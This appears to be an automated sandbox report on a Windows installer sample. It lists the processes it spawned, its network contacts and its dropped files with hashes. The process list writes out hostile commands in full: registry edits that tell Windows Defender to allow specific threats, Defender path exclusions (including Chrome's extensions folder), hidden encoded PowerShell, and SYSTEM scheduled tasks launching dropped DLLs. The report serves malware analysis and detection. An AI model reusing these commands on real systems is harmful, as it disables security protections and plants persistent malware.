"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BspasHMSlPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BspasHMSlPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JbudRisgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JbudRisgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VloXEwfyUAdsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VloXEwfyUAdsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpocSIDFTSWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpocSIDFTSWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\SRtRtaafQKnfEXVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\SRtRtaafQKnfEXVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LHhfOSCKsioeHeSb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LHhfOSCKsioeHeSb\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JbudRisgU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JbudRisgU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VloXEwfyUAdsC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VloXEwfyUAdsC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpocSIDFTSWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpocSIDFTSWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\SRtRtaafQKnfEXVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\SRtRtaafQKnfEXVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LHhfOSCKsioeHeSb /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LHhfOSCKsioeHeSb /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gwvQLOfIS" /SC once /ST 11:55:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gwvQLOfIS"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gwvQLOfIS"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "upHNLFTuuiluCLfgh" /SC once /ST 09:17:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe\" Cl /OkradidRO 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "upHNLFTuuiluCLfgh"

C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe

C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe Cl /OkradidRO 525403 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 592

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bqHlMUmkmlcBkJQYdf"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JbudRisgU\stYkoL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "lRoQVRoUFrjOsqP" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lRoQVRoUFrjOsqP2" /F /xml "C:\Program Files (x86)\JbudRisgU\nBtEyWy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "lRoQVRoUFrjOsqP"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "lRoQVRoUFrjOsqP"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "vgUxXpnJfcKULt" /F /xml "C:\Program Files (x86)\zpocSIDFTSWU2\WrVVPHN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wpskBTqwKoIAj2" /F /xml "C:\ProgramData\SRtRtaafQKnfEXVB\uBRmjsc.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "AStXSHyjxshhAOsqF2" /F /xml "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\qrVDylp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "icgpCYtcfpfzsLQuxBY2" /F /xml "C:\Program Files (x86)\VloXEwfyUAdsC\heGCxyl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QGYoMddbcQsigCFfl" /SC once /ST 07:34:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LHhfOSCKsioeHeSb\IEcADHVR\jNqRQVr.dll\",#1 /EdidbGPF 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QGYoMddbcQsigCFfl"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\LHhfOSCKsioeHeSb\IEcADHVR\jNqRQVr.dll",#1 /EdidbGPF 525403

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\LHhfOSCKsioeHeSb\IEcADHVR\jNqRQVr.dll",#1 /EdidbGPF 525403

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "upHNLFTuuiluCLfgh"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 2104

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QGYoMddbcQsigCFfl"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 32.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 api4.check-data.xyz udp
US 44.237.26.169:80 api4.check-data.xyz tcp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 50.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe

MD5 d043b671d7e8e9bb086126433ea712b8
SHA1 1f6ebe996416899959a6ac8e0b0453710de99f6d
SHA256 eb377737ba639c12cedaea7b50a86736106a96124f4118091ab621a5f93d6292
SHA512 236db719da09cdb4c38899b4e808c642d71416946eb38588b490a759a87403ac237f9bffcd3ef2c3bc0ebccce689779caa1faf9d984b2b82c45941ad80505211

C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe

MD5 5fe665bef128d199a6ddb92f355a8df8
SHA1 002bbbace8fb07b819f659fee1c7b1611f352371
SHA256 8004f2670dd27de6a59ed85578af4907f99fd28042a2c1a0008b06f36631129b
SHA512 5250857b2cb227a54521643ed078136a05741d919b34c1dfefc3d07573fed09f6e4bdc97b8e2009a585e4d414919258991319b2a3350cbed70a16b249af25dde

memory/4904-14-0x0000000004CA0000-0x0000000004CD6000-memory.dmp

memory/4904-15-0x0000000007960000-0x0000000007F88000-memory.dmp

memory/4904-16-0x00000000076F0000-0x0000000007712000-memory.dmp

memory/4904-18-0x0000000008070000-0x00000000080D6000-memory.dmp

memory/4904-17-0x0000000008000000-0x0000000008066000-memory.dmp

memory/4904-19-0x0000000008100000-0x0000000008450000-memory.dmp

memory/4904-20-0x0000000007FD0000-0x0000000007FEC000-memory.dmp

memory/4904-21-0x00000000089D0000-0x0000000008A1B000-memory.dmp

memory/4904-24-0x0000000008780000-0x00000000087F6000-memory.dmp

memory/780-23-0x0000000010000000-0x0000000011E5D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3pfymf1.05e.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4904-51-0x00000000095A0000-0x00000000095BA000-memory.dmp

memory/4904-50-0x00000000098F0000-0x0000000009984000-memory.dmp

memory/4904-52-0x0000000009610000-0x0000000009632000-memory.dmp

memory/4904-53-0x0000000009E90000-0x000000000A38E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1 eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbc1ccac8d583701b65e115e8d0987ea
SHA1 89f78c5690b3702e7bb20161da30d45eececd5bb
SHA256 e9f9ef375d6c98ffa515f1194a5752f58ce0755ed23f79f9d29f0ec698b2a73f
SHA512 201cee328e6d47508c7ccdf2dfeed6484d34657e43008457285d9bc049c29ef268289e298c8c18ac327234c1d2fb48529b55117b5a2c51911869b4122114b1a4

memory/1784-81-0x0000000010000000-0x0000000011E5D000-memory.dmp

memory/4176-97-0x0000000006900000-0x000000000694B000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7f3dcdb6c64a9549ef07109a72f17c6
SHA1 80057407cb51a89cee4f770a991d0b7aabcad747
SHA256 057150a6dfc8527f216532005895f3913194effebb070a8c00fbe46bffdbda83
SHA512 3875fe6bcb84f936857a7836588e0bbf2076898a708c483654f5d20ef55bef86258108097036c0472c52ab29617ca7c25d110531c71caaca72cff5124c52c8c8

memory/1516-133-0x00000168263E0000-0x0000016826402000-memory.dmp

memory/1516-137-0x0000016826590000-0x0000016826606000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2f24db7400469610631c24660c4ba30f
SHA1 1d13597ac19a79a017a7e7c517da028021d1e1cb
SHA256 dc78b874a0b5c16fea338f7215f31103e8389591fb00743321f14a89b4f195aa
SHA512 a3d77fc46921d19a1f32d2bf61b94fa1c86280967de6c5fc06ef62f0b85c0e107fa5e59857983471b49def1b8e8262279fcc9843fd80a20711c2e5be6eb4c02c

memory/4148-189-0x0000000010000000-0x0000000011E5D000-memory.dmp

memory/4148-202-0x0000000002710000-0x0000000002795000-memory.dmp

memory/4848-212-0x00000000067D0000-0x0000000006B20000-memory.dmp

